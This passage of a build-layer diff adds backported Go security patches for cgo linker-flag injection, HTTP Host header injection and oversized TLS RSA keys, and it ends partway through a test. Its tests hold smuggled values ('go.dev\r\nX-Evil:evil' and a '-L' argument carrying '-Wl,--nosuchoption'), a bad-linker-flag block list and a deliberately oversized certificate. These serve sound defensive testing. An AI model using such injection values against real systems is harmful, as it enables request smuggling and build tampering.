+ re(`-Wl,-rpath(-link)?[=,]([^,@\-][^,]+)`),
+ re(`-Wl,-s`),
+diff --git a/src/cmd/go/internal/work/security_test.go b/src/cmd/go/internal/work/security_test.go
+index bd707ff..7b0b7d3 100644
+--- a/src/cmd/go/internal/work/security_test.go
++++ b/src/cmd/go/internal/work/security_test.go
+@@ -220,6 +220,11 @@ var badLinkerFlags = [][]string{
+ {"-Wl,-R,@foo"},
+ {"-Wl,--just-symbols,@foo"},
+ {"../x.o"},
++ {"-Wl,-R,"},
++ {"-Wl,-O"},
++ {"-Wl,-e="},
++ {"-Wl,-e,"},
++ {"-Wl,-R,-flag"},
+ }
+
+ func TestCheckLinkerFlags(t *testing.T) {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
new file mode 100644
index 0000000000..70d50cc08a
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
@@ -0,0 +1,112 @@
+From fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Thu, 4 May 2023 14:06:39 -0700
+Subject: [PATCH] [release-branch.go1.20] cmd/go,cmd/cgo: in _cgo_flags use one
+ line per flag
+
+The flags that we recorded in _cgo_flags did not use any quoting,
+so a flag containing embedded spaces was mishandled.
+Change the _cgo_flags format to put each flag on a separate line.
+That is a simple format that does not require any quoting.
+
+As far as I can tell only cmd/go uses _cgo_flags, and it is only
+used for gccgo. If this patch doesn't cause any trouble, then
+in the next release we can change to only using _cgo_flags for gccgo.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60306
+Fixes #60514
+Fixes CVE-2023-29405
+
+Change-Id: I36b6e188a44c80d7b9573efa577c386770bd2ba3
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1875094
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit bcdfcadd5612212089d958bc352a6f6c90742dcc)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902228
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904345
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501220
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: David Chase <drchase@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+---
+Upstream-Status: Backport [https://github.com/golang/go/commit/fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4]
+CVE: CVE-2023-29405
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ src/cmd/cgo/out.go | 4 +++-
+ src/cmd/go/internal/work/gccgo.go | 14 ++++++-------
+ .../go/testdata/script/gccgo_link_ldflags.txt | 20 +++++++++++++++++++
+ 3 files changed, 29 insertions(+), 9 deletions(-)
+ create mode 100644 src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+
+diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
+index d26f9e76a374a..d0c6fe3d4c2c2 100644
+--- a/src/cmd/cgo/out.go
++++ b/src/cmd/cgo/out.go
+@@ -47,7 +47,9 @@ func (p *Package) writeDefs() {
+
+ fflg := creat(*objDir + "_cgo_flags")
+ for k, v := range p.CgoFlags {
+- fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, strings.Join(v, " "))
++ for _, arg := range v {
++ fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
++ }
+ if k == "LDFLAGS" && !*gccgo {
+ for _, arg := range v {
+ fmt.Fprintf(fgo2, "//go:cgo_ldflag %q\n", arg)
+diff --git a/src/cmd/go/internal/work/gccgo.go b/src/cmd/go/internal/work/gccgo.go
+index 08a4c2d8166c7..a048b7f4eecef 100644
+--- a/src/cmd/go/internal/work/gccgo.go
++++ b/src/cmd/go/internal/work/gccgo.go
+@@ -280,14 +280,12 @@ func (tools gccgoToolchain) link(b *Builder, root *Action, out, importcfg string
+ const ldflagsPrefix = "_CGO_LDFLAGS="
+ for _, line := range strings.Split(string(flags), "\n") {
+ if strings.HasPrefix(line, ldflagsPrefix) {
+- newFlags := strings.Fields(line[len(ldflagsPrefix):])
+- for _, flag := range newFlags {
+- // Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
+- // but they don't mean anything to the linker so filter
+- // them out.
+- if flag != "-g" && !strings.HasPrefix(flag, "-O") {
+- cgoldflags = append(cgoldflags, flag)
+- }
++ flag := line[len(ldflagsPrefix):]
++ // Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
++ // but they don't mean anything to the linker so filter
++ // them out.
++ if flag != "-g" && !strings.HasPrefix(flag, "-O") {
++ cgoldflags = append(cgoldflags, flag)
+ }
+ }
+ }
+diff --git a/src/cmd/go/testdata/script/gccgo_link_ldflags.txt b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+new file mode 100644
+index 0000000000000..4e91ae56505b6
+--- /dev/null
++++ b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+@@ -0,0 +1,20 @@
++# Test that #cgo LDFLAGS are properly quoted.
++# The #cgo LDFLAGS below should pass a string with spaces to -L,
++# as though searching a directory with a space in its name.
++# It should not pass --nosuchoption to the external linker.
++
++[!cgo] skip
++
++go build
++
++[!exec:gccgo] skip
++
++go build -compiler gccgo
++
++-- go.mod --
++module m
++-- cgo.go --
++package main
++// #cgo LDFLAGS: -L "./ -Wl,--nosuchoption"
++import "C"
++func main() {}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
new file mode 100644
index 0000000000..369eca581e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
@@ -0,0 +1,38 @@
+From 1008486a9ff979dbd21c7466eeb6abf378f9c637 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Tue, 6 Jun 2023 12:51:17 -0700
+Subject: [PATCH] [release-branch.go1.20] cmd/cgo: correct _cgo_flags output
+
+For #60306
+For #60514
+
+Change-Id: I3f5d14aee7d7195030e8872e42b1d97aa11d3582
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501298
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: David Chase <drchase@google.com>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+---
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/1008486a9ff979dbd21c7466eeb6abf378f9c637]
+CVE: CVE-2023-29405
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+
+ src/cmd/cgo/out.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
+index d0c6fe3d4c2c2..a48f52105628a 100644
+--- a/src/cmd/cgo/out.go
++++ b/src/cmd/cgo/out.go
+@@ -48,7 +48,7 @@ func (p *Package) writeDefs() {
+ fflg := creat(*objDir + "_cgo_flags")
+ for k, v := range p.CgoFlags {
+ for _, arg := range v {
+- fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
++ fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, arg)
+ }
+ if k == "LDFLAGS" && !*gccgo {
+ for _, arg := range v {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
new file mode 100644
index 0000000000..080def4682
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
@@ -0,0 +1,212 @@
+From 5fa6923b1ea891400153d04ddf1545e23b40041b Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 28 Jun 2023 13:20:08 -0700
+Subject: [PATCH] [release-branch.go1.19] net/http: validate Host header before
+ sending
+
+Verify that the Host header we send is valid.
+Avoids surprising behavior such as a Host of "go.dev\r\nX-Evil:oops"
+adding an X-Evil header to HTTP/1 requests.
+
+Add a test, skip the test for HTTP/2. HTTP/2 is not vulnerable to
+header injection in the way HTTP/1 is, but x/net/http2 doesn't validate
+the header and will go into a retry loop when the server rejects it.
+CL 506995 adds the necessary validation to x/net/http2.
+
+Updates #60374
+Fixes #61075
+For CVE-2023-29406
+
+Change-Id: I05cb6866a9bead043101954dfded199258c6dd04
+Reviewed-on: https://go-review.googlesource.com/c/go/+/506996
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit 499458f7ca04087958987a33c2703c3ef03e27e2)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/507358
+Run-TryBot: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5fa6923b1ea891400153d04ddf1545e23b40041b]
+CVE: CVE-2023-29406
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/net/http/http_test.go | 29 ---------------------
+ src/net/http/request.go | 47 ++++++++--------------------------
+ src/net/http/request_test.go | 11 ++------
+ src/net/http/transport_test.go | 18 +++++++++++++
+ 4 files changed, 31 insertions(+), 74 deletions(-)
+
+diff --git a/src/net/http/http_test.go b/src/net/http/http_test.go
+index f4ea52d..ea38cb4 100644
+--- a/src/net/http/http_test.go
++++ b/src/net/http/http_test.go
+@@ -49,35 +49,6 @@ func TestForeachHeaderElement(t *testing.T) {
+ }
+ }
+
+-func TestCleanHost(t *testing.T) {
+- tests := []struct {
+- in, want string
+- }{
+- {"www.google.com", "www.google.com"},
+- {"www.google.com foo", "www.google.com"},
+- {"www.google.com/foo", "www.google.com"},
+- {" first character is a space", ""},
+- {"[1::6]:8080", "[1::6]:8080"},
+-
+- // Punycode:
+- {"гофер.рф/foo", "xn--c1ae0ajs.xn--p1ai"},
+- {"bücher.de", "xn--bcher-kva.de"},
+- {"bücher.de:8080", "xn--bcher-kva.de:8080"},
+- // Verify we convert to lowercase before punycode:
+- {"BÜCHER.de", "xn--bcher-kva.de"},
+- {"BÜCHER.de:8080", "xn--bcher-kva.de:8080"},
+- // Verify we normalize to NFC before punycode:
+- {"gophér.nfc", "xn--gophr-esa.nfc"}, // NFC input; no work needed
+- {"goph\u0065\u0301r.nfd", "xn--gophr-esa.nfd"}, // NFD input
+- }
+- for _, tt := range tests {
+- got := cleanHost(tt.in)
+- if tt.want != got {
+- t.Errorf("cleanHost(%q) = %q, want %q", tt.in, got, tt.want)
+- }
+- }
+-}
+-
+ // Test that cmd/go doesn't link in the HTTP server.
+ //
+ // This catches accidental dependencies between the HTTP transport and
+diff --git a/src/net/http/request.go b/src/net/http/request.go
+index cb2edd2..2706300 100644
+--- a/src/net/http/request.go
++++ b/src/net/http/request.go
+@@ -18,7 +18,6 @@ import (
+ "io/ioutil"
+ "mime"
+ "mime/multipart"
+- "net"
+ "net/http/httptrace"
+ "net/textproto"
+ "net/url"
+@@ -26,7 +25,8 @@ import (
+ "strconv"
+ "strings"
+ "sync"
+-
++
++ "golang.org/x/net/http/httpguts"
+ "golang.org/x/net/idna"
+ )
+
+@@ -557,12 +557,19 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
+ // is not given, use the host from the request URL.
+ //
+ // Clean the host, in case it arrives with unexpected stuff in it.
+- host := cleanHost(r.Host)
++ host := r.Host
+ if host == "" {
+ if r.URL == nil {
+ return errMissingHost
+ }
+- host = cleanHost(r.URL.Host)
++ host = r.URL.Host
++ }
++ host, err = httpguts.PunycodeHostPort(host)
++ if err != nil {
++ return err
++ }
++ if !httpguts.ValidHostHeader(host) {
++ return errors.New("http: invalid Host header")
+ }
+
+ // According to RFC 6874, an HTTP client, proxy, or other
+@@ -717,38 +724,6 @@ func idnaASCII(v string) (string, error) {
+ return idna.Lookup.ToASCII(v)
+ }
+
+-// cleanHost cleans up the host sent in request's Host header.
+-//
+-// It both strips anything after '/' or ' ', and puts the value
+-// into Punycode form, if necessary.
+-//
+-// Ideally we'd clean the Host header according to the spec:
+-// https://tools.ietf.org/html/rfc7230#section-5.4 (Host = uri-host [ ":" port ]")
+-// https://tools.ietf.org/html/rfc7230#section-2.7 (uri-host -> rfc3986's host)
+-// https://tools.ietf.org/html/rfc3986#section-3.2.2 (definition of host)
+-// But practically, what we are trying to avoid is the situation in
+-// issue 11206, where a malformed Host header used in the proxy context
+-// would create a bad request. So it is enough to just truncate at the
+-// first offending character.
+-func cleanHost(in string) string {
+- if i := strings.IndexAny(in, " /"); i != -1 {
+- in = in[:i]
+- }
+- host, port, err := net.SplitHostPort(in)
+- if err != nil { // input was just a host
+- a, err := idnaASCII(in)
+- if err != nil {
+- return in // garbage in, garbage out
+- }
+- return a
+- }
+- a, err := idnaASCII(host)
+- if err != nil {
+- return in // garbage in, garbage out
+- }
+- return net.JoinHostPort(a, port)
+-}
+-
+ // removeZone removes IPv6 zone identifier from host.
+ // E.g., "[fe80::1%en0]:8080" to "[fe80::1]:8080"
+ func removeZone(host string) string {
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 461d66e..0d417ff 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -676,15 +676,8 @@ func TestRequestBadHost(t *testing.T) {
+ }
+ req.Host = "foo.com with spaces"
+ req.URL.Host = "foo.com with spaces"
+- req.Write(logWrites{t, &got})
+- want := []string{
+- "GET /after HTTP/1.1\r\n",
+- "Host: foo.com\r\n",
+- "User-Agent: " + DefaultUserAgent + "\r\n",
+- "\r\n",
+- }
+- if !reflect.DeepEqual(got, want) {
+- t.Errorf("Writes = %q\n Want = %q", got, want)
++ if err := req.Write(logWrites{t, &got}); err == nil {
++ t.Errorf("Writing request with invalid Host: succeded, want error")
+ }
+ }
+
+diff --git a/src/net/http/transport_test.go b/src/net/http/transport_test.go
+index fa0c370..0afb6b9 100644
+--- a/src/net/http/transport_test.go
++++ b/src/net/http/transport_test.go
+@@ -6249,3 +6249,21 @@ func TestIssue32441(t *testing.T) {
+ t.Error(err)
+ }
+ }
++
++func TestRequestSanitization(t *testing.T) {
++ setParallel(t)
++ defer afterTest(t)
++
++ ts := newClientServerTest(t, h1Mode, HandlerFunc(func(rw ResponseWriter, req *Request) {
++ if h, ok := req.Header["X-Evil"]; ok {
++ t.Errorf("request has X-Evil header: %q", h)
++ }
++ })).ts
++ defer ts.Close()
++ req, _ := NewRequest("GET", ts.URL, nil)
++ req.Host = "go.dev\r\nX-Evil:evil"
++ resp, _ := ts.Client().Do(req)
++ if resp != nil {
++ resp.Body.Close()
++ }
++}
+--
+2.25.1
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
new file mode 100644
index 0000000000..637f46a537
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
@@ -0,0 +1,114 @@
+From c08a5fa413a34111c9a37fd9e545de27ab0978b1 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 19 Jul 2023 10:30:46 -0700
+Subject: [PATCH] [release-branch.go1.19] net/http: permit requests with
+ invalid Host headers
+
+Historically, the Transport has silently truncated invalid
+Host headers at the first '/' or ' ' character. CL 506996 changed
+this behavior to reject invalid Host headers entirely.
+Unfortunately, Docker appears to rely on the previous behavior.
+
+When sending a HTTP/1 request with an invalid Host, send an empty
+Host header. This is safer than truncation: If you care about the
+Host, then you should get the one you set; if you don't care,
+then an empty Host should be fine.
+
+Continue to fully validate Host headers sent to a proxy,
+since proxies generally can't productively forward requests
+without a Host.
+
+For #60374
+Fixes #61431
+Fixes #61825
+
+Change-Id: If170c7dd860aa20eb58fe32990fc93af832742b6
+Reviewed-on: https://go-review.googlesource.com/c/go/+/511155
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit b9153f6ef338baee5fe02a867c8fbc83a8b29dd1)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/518855
+Auto-Submit: Dmitri Shuralyov <dmitshur@google.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c08a5fa413a34111c9a37fd9e545de27ab0978b1]
+CVE: CVE-2023-29406
+Signed-off-by: Ming Liu <liu.ming50@gmail.com>
+---
+ src/net/http/request.go | 23 ++++++++++++++++++++++-
+ src/net/http/request_test.go | 17 ++++++++++++-----
+ 2 files changed, 34 insertions(+), 6 deletions(-)
+
+diff --git a/src/net/http/request.go b/src/net/http/request.go
+index 3100037386..91cb8a66b9 100644
+--- a/src/net/http/request.go
++++ b/src/net/http/request.go
+@@ -582,8 +582,29 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
+ if err != nil {
+ return err
+ }
++ // Validate that the Host header is a valid header in general,
++ // but don't validate the host itself. This is sufficient to avoid
++ // header or request smuggling via the Host field.
++ // The server can (and will, if it's a net/http server) reject
++ // the request if it doesn't consider the host valid.
+ if !httpguts.ValidHostHeader(host) {
+- return errors.New("http: invalid Host header")
++ // Historically, we would truncate the Host header after '/' or ' '.
++ // Some users have relied on this truncation to convert a network
++ // address such as Unix domain socket path into a valid, ignored
++ // Host header (see https://go.dev/issue/61431).
++ //
++ // We don't preserve the truncation, because sending an altered
++ // header field opens a smuggling vector. Instead, zero out the
++ // Host header entirely if it isn't valid. (An empty Host is valid;
++ // see RFC 9112 Section 3.2.)
++ //
++ // Return an error if we're sending to a proxy, since the proxy
++ // probably can't do anything useful with an empty Host header.
++ if !usingProxy {
++ host = ""
++ } else {
++ return errors.New("http: invalid Host header")
++ }
+ }
+
+ // According to RFC 6874, an HTTP client, proxy, or other
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index fddc85d6a9..dd1e2dc2a1 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -770,16 +770,23 @@ func TestRequestWriteBufferedWriter(t *testing.T) {
+ }
+ }
+
+-func TestRequestBadHost(t *testing.T) {
++func TestRequestBadHostHeader(t *testing.T) {
+ got := []string{}
+ req, err := NewRequest("GET", "http://foo/after", nil)
+ if err != nil {
+ t.Fatal(err)
+ }
+- req.Host = "foo.com with spaces"
+- req.URL.Host = "foo.com with spaces"
+- if err := req.Write(logWrites{t, &got}); err == nil {
+- t.Errorf("Writing request with invalid Host: succeded, want error")
++ req.Host = "foo.com\nnewline"
++ req.URL.Host = "foo.com\nnewline"
++ req.Write(logWrites{t, &got})
++ want := []string{
++ "GET /after HTTP/1.1\r\n",
++ "Host: \r\n",
++ "User-Agent: " + DefaultUserAgent + "\r\n",
++ "\r\n",
++ }
++ if !reflect.DeepEqual(got, want) {
++ t.Errorf("Writes = %q\n Want = %q", got, want)
+ }
+ }
+
+--
+2.34.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
new file mode 100644
index 0000000000..00685cc180
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
@@ -0,0 +1,175 @@
+From 2300f7ef07718f6be4d8aa8486c7de99836e233f Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 7 Jun 2023 15:27:13 -0700
+Subject: [PATCH] [release-branch.go1.19] crypto/tls: restrict RSA keys in
+ certificates to <= 8192 bits
+
+Extremely large RSA keys in certificate chains can cause a client/server
+to expend significant CPU time verifying signatures. Limit this by
+restricting the size of RSA keys transmitted during handshakes to <=
+8192 bits.
+
+Based on a survey of publicly trusted RSA keys, there are currently only
+three certificates in circulation with keys larger than this, and all
+three appear to be test certificates that are not actively deployed. It
+is possible there are larger keys in use in private PKIs, but we target
+the web PKI, so causing breakage here in the interests of increasing the
+default safety of users of crypto/tls seems reasonable.
+
+Thanks to Mateusz Poliwczak for reporting this issue.
+
+Updates #61460
+Fixes #61579
+Fixes CVE-2023-29409
+
+Change-Id: Ie35038515a649199a36a12fc2c5df3af855dca6c
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1912161
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit d865c715d92887361e4bd5596e19e513f27781b7)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1965487
+Reviewed-on: https://go-review.googlesource.com/c/go/+/514915
+Run-TryBot: David Chase <drchase@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+TryBot-Bypass: David Chase <drchase@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2300f7ef07718f6be4d8aa8486c7de99836e233f]
+CVE: CVE-2023-29409
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/tls/handshake_client.go | 8 +++
+ src/crypto/tls/handshake_client_test.go | 78 +++++++++++++++++++++++++
+ src/crypto/tls/handshake_server.go | 4 ++
+ 3 files changed, 90 insertions(+)
+
+diff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go
+index 4fb528c..ba33ea1 100644
+--- a/src/crypto/tls/handshake_client.go
++++ b/src/crypto/tls/handshake_client.go
+@@ -788,6 +788,10 @@ func (hs *clientHandshakeState) sendFinished(out []byte) error {
+ return nil
+ }
+
++// maxRSAKeySize is the maximum RSA key size in bits that we are willing
++// to verify the signatures of during a TLS handshake.
++const maxRSAKeySize = 8192
++
+ // verifyServerCertificate parses and verifies the provided chain, setting
+ // c.verifiedChains and c.peerCertificates or sending the appropriate alert.
+ func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
+@@ -798,6 +802,10 @@ func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
+ c.sendAlert(alertBadCertificate)
+ return errors.New("tls: failed to parse certificate from server: " + err.Error())
+ }
++ if cert.PublicKeyAlgorithm == x509.RSA && cert.PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
++ c.sendAlert(alertBadCertificate)
++ return fmt.Errorf("tls: server sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
++ }
+ certs[i] = cert
+ }
+
+diff --git a/src/crypto/tls/handshake_client_test.go b/src/crypto/tls/handshake_client_test.go
+index 6bd3c37..8d20b2b 100644
+--- a/src/crypto/tls/handshake_client_test.go
++++ b/src/crypto/tls/handshake_client_test.go
+@@ -1984,3 +1984,81 @@ func TestCloseClientConnectionOnIdleServer(t *testing.T) {
+ t.Errorf("Error expected, but no error returned")
+ }
+ }
++
++// discardConn wraps a net.Conn but discards all writes, but reports that they happened.
++type discardConn struct {
++ net.Conn
++}
++
++func (dc *discardConn) Write(data []byte) (int, error) {
++ return len(data), nil
++}
++
++// largeRSAKeyCertPEM contains a 8193 bit RSA key
++const largeRSAKeyCertPEM = `-----BEGIN CERTIFICATE-----
++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
++u58=
++-----END CERTIFICATE-----`
++
++func TestHandshakeRSATooBig(t *testing.T) {
++ testCert, _ := pem.Decode([]byte(largeRSAKeyCertPEM))
++
++ c := &Conn{conn: &discardConn{}, config: testConfig.Clone()}
++
